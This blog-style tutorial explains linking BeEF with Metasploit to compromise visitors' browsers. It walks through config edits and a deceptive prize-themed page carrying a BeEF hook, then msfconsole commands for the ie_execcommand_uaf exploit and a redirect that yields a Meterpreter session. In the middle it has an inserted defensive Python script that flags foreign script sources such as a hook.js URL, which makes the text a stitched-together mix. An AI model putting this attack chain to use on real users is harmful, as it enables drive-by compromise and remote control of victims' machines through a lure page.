Integrating Metasploit with Browser Exploitation Framework


In the last post we got started with BeEF and saw how inserting a JavaScript link into a page compromises a client's browser.

The Browser Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun.

But you will have no Metasploit Framework integration by default.

Let's fix that by first editing the /usr/share/beef-xss/config.yaml file. We want to change the metasploit part (lines 20 and 21) to this:

# vi /usr/share/beef-xss/config.yaml

enable: true


Next, we will edit the /usr/share/beef-xss/extensions/metasploit/config.yaml file.

You need to edit the lines host: and callback_host: (put your IP address there) and {os: 'custom', path: ''} (just paste '/usr/share/metasploit-framework/' for the path), so that they look like this:

# vi /usr/share/beef-xss/extensions/metasploit/config.yaml

host: ""

pass: "bhuvi"

callback_host: ""

{os: 'custom', path: '/usr/share/metasploit-framework'}


Now, we are ready to start msfconsole, and load the msgrpc module like this:

# /etc/init.d/postgresql restart && /etc/init.d/metasploit restart


msf > load msgrpc ServerHost= Pass=bhuvi


And now, we can start BeEF:

# cd /usr/share/beef-xss/

Among the BeEF start-up messages, you should see something like:

[*] Successful connection with Metasploit.

[*] Loaded 232 Metasploit exploits.


For testing, we are going to create an HTML page with the JavaScript hook embedded.

# vi /var/www/index.html

<title> Win Prices with Latest model Bikes. </title>
<script src=""></script>
<img src="bike.jpg"/>


I downloaded bike.jpg from Google and put it in the /var/www directory.


Now, when any client opens the URL, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.
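Seen from the defender's side, the hooked page above is an ordinary page with one extra script element loaded from a foreign host. The following is an added example, not code from the original post: it lists the script sources in a page and flags any that are neither same-origin nor allowlisted. The sample page, the address 192.0.2.10, the host names and the function names are constructed for illustration, and hook.js on port 3000 is assumed as BeEF's default hook location.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page, modelled on the test page above. The script host
# 192.0.2.10 is a documentation address (RFC 5737), not a value from the post.
SAMPLE_PAGE = """
<title> Win Prices with Latest model Bikes. </title>
<script src="http://192.0.2.10:3000/hook.js"></script>
<script src="/static/site.js"></script>
<img src="bike.jpg"/>
"""

class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> element."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def audit_scripts(html, page_url, allowed_hosts):
    """Return (url, reason) for each script loaded from an unapproved host."""
    page_host = urlsplit(page_url).hostname
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        absolute = urljoin(page_url, src)  # resolves relative and // URLs
        parts = urlsplit(absolute)
        host = parts.hostname
        if host == page_host or host in allowed_hosts:
            continue
        reason = "script from unapproved host " + str(host)
        # Assumption: hook.js is BeEF's default hook name; it can be renamed,
        # so the host check above is the primary signal.
        if parts.path.lower().endswith("/hook.js"):
            reason += " (BeEF default hook filename)"
        findings.append((absolute, reason))
    return findings

if __name__ == "__main__":
    for url, reason in audit_scripts(SAMPLE_PAGE, "http://www.example.test/", set()):
        print(url, "->", reason)
```

Run against saved copies of your own pages, the same check catches a hook injected through stored XSS or a modified template, because the new script element points at a host you never approved.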

Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop up, representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

Now it's time to use Metasploit. After getting complete control of the victim's browser, use the redirect command to send it to the Metasploit listener.


msf > load msgrpc ServerHost= Pass=bhuvi

msf > use exploit/windows/browser/ie_execcommand_uaf

msf exploit(ie_execcommand_uaf) > show options

msf exploit(ie_execcommand_uaf) > set SRVHOST

msf exploit(ie_execcommand_uaf) > set SRVPORT 8080

msf exploit(ie_execcommand_uaf) > set URIPATH /

msf exploit(ie_execcommand_uaf) > exploit


Now check out the BeEF control panel. In my case it’s and in the command section, click Redirect Browser and enter the Metasploit listener.


Then it will get a Meterpreter session.
